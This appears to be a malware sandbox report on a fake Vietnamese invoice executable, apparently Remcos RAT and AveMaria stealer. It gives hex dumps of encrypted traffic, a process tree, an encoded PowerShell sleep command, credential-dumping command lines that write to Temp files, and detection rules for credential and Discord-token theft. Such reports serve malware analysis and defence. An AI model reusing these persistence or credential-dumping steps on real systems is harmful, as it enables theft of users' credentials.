                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2727INData Raw: 78 0f f3 63 08 02 a0 46 9b 2e 4b 38 f1 c9 42 57 2c 86 de 12 ea ec 66 4e 31 b9 5d 94 99 a5 62 d1 dd 4a 10 e7 8e 57 88 9c cb 75 8d a7 ea 64 38 ec 70 5a a4 cd 8b 19 84 c0 fd e4 9c ba 72 96 bf 61 c3 84 d6 33 47 e7 b5 58 f0 cc 25 99 a3 07 34 ab 70 f2 fb 3b 33 31 29 f1 bd 0e 28 8d 58 be 94 c1 57 bb 3a 0b c8 ea 83 b5 84 e9 87 43 91 8a 88 f7 47 bf b1 28 21 e0 b1 f8 50 5f 59 1e 0b e6 1b 2c fe 86 c9 c8 6b 35 fd 5f ab ad 2a b9 19 2d 80 69 cb 6a c2 2f b4 a8 fb 49 bb 04 42 f6 b1 80 fa d6 75 6b 49 3f 4d 8a f5 0e 17 4e 97 4f 90 47 ae 03 e3 51 92 38 a4 80 b0 de 73 56 b9 93 ee 53 98 57 71 fe 34 27 6f 1d c4 ae 57 10 e9 e2 16 37 4b ba e5 2e 08 75 5c 00 31 af a5 c4 c6 c1 2c 2e ca 33 d5 6e f2 6e e8 a5 27 46 5b 5e 6f d9 36 3a a5 d8 d8 62 60 e4 67 b6 d3 b8 23 f2 c3 d7 59 79 65
                                                                                                                                                                                                                                                                Data Ascii: xcF.K8BW,fN1]bJWud8pZra3GX%4p;31)(XW:CG(!P_Y,k5_*-ij/IBukI?MNOGQ8sVSWq4'oW7K.u\1,.3nn'F[^o6:b`g#Yye
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2743INData Raw: c4 e7 1d 9c 21 13 69 ff 6a e9 0a 7c 25 70 52 85 99 81 a5 dc 80 f2 80 43 c7 a2 89 79 0a b7 8f 51 7f 4f a4 49 43 df 5c e5 27 7c fd a6 53 6f 9f 9d 87 07 68 7c b1 c2 11 29 1d f3 06 36 6b b2 38 55 d5 ac a6 b9 f0 d6 c1 38 0c 32 85 f3 34 e0 48 5d aa 5b 9d ff ec 01 75 40 cf 42 05 8c d2 d7 4b a0 57 ef 37 3d 5c e7 d4 2e 1c b8 c9 55 b4 c8 55 62 b3 f1 f5 8a 25 81 2c 77 c1 44 d2 ee 4a 8c 57 9d e9 f8 13 6f a3 87 64 17 e1 12 26 a9 b5 ab 4a f6 67 38 c8 7e ca 33 73 e0 dd 79 da 89 91 aa ea 3d b0 70 1c d2 18 6e 4d 8f 24 de 9b 86 54 65 79 65 59 00 99 1b 94 50 51 ed 58 ad ce 26 97 15 9d f3 cb 3f 58 f6 66 6a da 90 29 b1 50 1a e7 9b 53 54 27 21 38 c2 e0 d0 21 76 6f 99 82 16 f3 da d8 07 09 fa b5 3b 34 5c 6a 05 68 be 41 f5 88 11 e7 bb 08 a6 d0 4c 85 7a a1 c5 36 27 b6 47 43 e4 65
                                                                                                                                                                                                                                                                Data Ascii: !ij|%pRCyQOIC\'|Soh|)6k8U824H][u@BKW7=\.UUb%,wDJWod&Jg8~3sy=pnM$TeyeYPQX&?Xfj)PST'!8!vo;4\jhALz6'GCe
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2759INData Raw: a7 70 7f be 12 9b 1d cd b8 dc 30 80 79 10 e0 43 b6 22 88 f1 56 0b 21 97 e3 19 ad c7 3c 4f e9 76 2d 9b 14 7a ed b6 40 01 21 06 10 17 0b b7 08 a0 c6 3f 3b 45 30 ee 41 39 05 f6 f1 c1 68 41 99 0b 4e 11 09 e6 d1 7f 58 a4 bc a1 65 5b 7d f6 40 42 b2 a4 80 9c 79 48 fa 74 bf 30 31 93 78 7a f7 62 8a 29 57 16 3b c5 45 7a bf 2f 22 02 f6 0f d5 8c 39 c4 5d 2d 67 8f 4c f2 07 1f e1 99 18 6d a0 4a a5 08 03 17 fb 33 0b 9b e4 d6 98 ec 30 a5 bd 18 23 7b 25 5d b6 f3 86 4b 38 ec 70 89 6a 32 98 53 8e f5 e4 1f e4 9e 55 d4 6f e0 db 56 d5 7f de 27 a6 25 8b 74 bd a5 3a 06 45 e0 84 2c 03 a8 24 db e8 37 66 6b 22 ed 27 c8 13 f6 ec 14 9d b8 ff 69 eb f6 81 f0 8f 14 c0 b4 f1 d8 09 9e 3d 5c 3a d1 75 f3 db 8a 07 bd 8d cf 2e 28 01 8a 4e 1e ef 4a 28 80 b9 2a e6 63 a9 4b c8 33 9c f1 6a 1d 1e
                                                                                                                                                                                                                                                                Data Ascii: p0yC"V!<Ov-z@!?;E0A9hANXe[}@ByHt01xzb)W;Ez/"9]-gLmJ30#{%]K8pj2SUoV'%t:E,$7fk"'i=\:u.(NJ(*cK3j
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2775INData Raw: 8a c1 3e fa 53 f0 ba 2a 1d 58 51 9b 0f d0 aa d3 17 40 fc 44 d5 f6 87 fa 79 f3 21 6d 67 13 2b 96 6d ef 0a 78 75 df 09 87 68 65 7c 5e 2d 8d 15 fa 08 af 22 2a fd 86 c8 fa e1 a3 3d 44 e7 99 9e a6 ff 03 87 61 04 c3 a6 b8 4f 49 29 b6 15 c3 02 1c b2 75 0d 91 5e eb 84 a7 3d 9a 29 4c 7a 0a 4d ad a3 4a 08 7c 59 69 f6 d3 e1 b1 d5 bb cf 0e 89 34 8c f7 72 42 6f 46 39 ab 5c dc 16 cb b0 60 d9 ef f0 8f fa 3d ca 90 2b 13 54 02 7e 87 1b cc 32 5c 85 84 f7 34 90 07 11 41 26 a8 37 41 3c 42 b3 3f c1 d9 39 9c 18 ad 16 a7 a7 fd 48 48 fc 51 35 29 98 4b ce e1 44 41 b4 e1 42 41 8f 0d d3 2f 98 61 9f ba ef 2e df cb 7d aa 6d 59 07 64 2e b3 ea cb a5 83 83 a4 1a 60 1e 8f 5d 8b b3 2e d5 df e0 b7 e2 58 16 27 47 59 f9 d3 ac 10 48 19 61 86 01 24 49 0b 42 76 0e 38 ee f0 4c 72 1a ef c2 1c 73
                                                                                                                                                                                                                                                                Data Ascii: >S*XQ@Dy!mg+mxuhe|^-"*=DaOI)u^=)LzMJ|Yi4rBoF9\`=+T~2\4A&7A<B?9HHQ5)KDABA/a.}mYd.`].X'GYHa$IBv8Lrs
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2791INData Raw: ac 78 83 f8 b6 b8 f8 31 0a a0 e6 9e 0e d3 9d 9f c5 e4 c6 a6 18 9d 85 7a 25 fd 71 73 c5 7d 0c 52 7a 44 29 20 2f 1b 74 9e 33 1a 0c 04 2c 0c 13 de 5b fd 93 26 f0 df a1 29 27 eb cf 7f 60 22 5f a2 89 6e 9a a5 55 2f f1 b1 84 2c a8 78 0d c4 49 2e 11 eb 9a 57 87 be 17 12 74 5e 57 cd 6e dc f6 d5 45 72 3c a3 80 e6 f8 0f c5 91 33 96 f1 05 02 4d 47 10 c6 64 21 03 1a 02 d4 06 5f 89 70 96 9f 6c 94 fa e9 0c 51 1d ff f0 55 d5 ba 01 50 29 e1 41 e6 40 27 ec 60 25 5b 5c f7 54 6a 60 6a 20 3a 82 4b 0a 3a b9 03 73 c9 7f cd fc fd 11 32 e9 49 85 bb 45 da 60 12 f4 01 38 94 55 73 56 65 61 63 67 fc cf ac 77 51 51 22 a5 59 af 63 f9 63 f6 75 d5 fe 06 ae d2 b1 70 c0 7c 80 65 72 65 19 a6 5f a4 1a ed d2 48 1f fb c8 da 5b 06 3a b8 48 43 46 2f b9 49 2f f6 75 4c f3 80 b0 b8 e8 e4 26 8c f3
                                                                                                                                                                                                                                                                Data Ascii: x1z%qs}RzD) /t3,[&)'`"_nU/,xI.Wt^WnEr<3MGd!_plQUP)A@'`%[\Tj`j :K:s2IE`8UsVeacgwQQ"Yccup|ere_H[:HCF/I/uL&


                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                Start time:09:22:06
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
                                                                                                                                                                                                                                                                Imagebase:0x180000
                                                                                                                                                                                                                                                                File size:8704 bytes
                                                                                                                                                                                                                                                                MD5 hash:A07407FCE937593044AD512F4A6D7A1E
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.365213489.0000000007610000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.355179401.0000000002596000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.271856566.0000000003772000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                Start time:09:22:28
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                                                                                                                                                                                                Imagebase:0x1090000
                                                                                                                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                Start time:09:22:28
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                Start time:09:22:52
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Imagebase:0xd60000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                                Start time:09:22:57
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                                Start time:09:22:57
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"
                                                                                                                                                                                                                                                                Imagebase:0x7ff68f300000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                                Start time:09:22:58
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ubrkswxpfz"
                                                                                                                                                                                                                                                                Imagebase:0x910000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                                Start time:09:22:59
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\evectoiqthdfs"
                                                                                                                                                                                                                                                                Imagebase:0x850000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                                Start time:09:23:03
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\dwn.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\dwn.exe"
                                                                                                                                                                                                                                                                Imagebase:0xae0000
                                                                                                                                                                                                                                                                File size:8704 bytes
                                                                                                                                                                                                                                                                MD5 hash:0E4816AC89A716B262402CD1791400DF
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.543466399.0000000003093000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.600053448.0000000007BD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                                                Start time:09:23:05
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe"
                                                                                                                                                                                                                                                                Imagebase:0x120000
                                                                                                                                                                                                                                                                File size:8704 bytes
                                                                                                                                                                                                                                                                MD5 hash:A07407FCE937593044AD512F4A6D7A1E
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                                Start time:09:23:07
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ixjslbemgsufoiuudk"
                                                                                                                                                                                                                                                                Imagebase:0x740000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                                Start time:09:23:07
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"
                                                                                                                                                                                                                                                                Imagebase:0x1b0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                                Start time:09:23:08
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"
                                                                                                                                                                                                                                                                Imagebase:0x8d0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                                Start time:09:23:08
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
                                                                                                                                                                                                                                                                Imagebase:0xa0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                                Start time:09:23:08
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
                                                                                                                                                                                                                                                                Imagebase:0x360000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                                Start time:09:23:09
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
                                                                                                                                                                                                                                                                Imagebase:0xc0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                                                Start time:09:23:09
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
                                                                                                                                                                                                                                                                Imagebase:0x70000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                                                Start time:09:23:09
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
                                                                                                                                                                                                                                                                Imagebase:0x2b0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
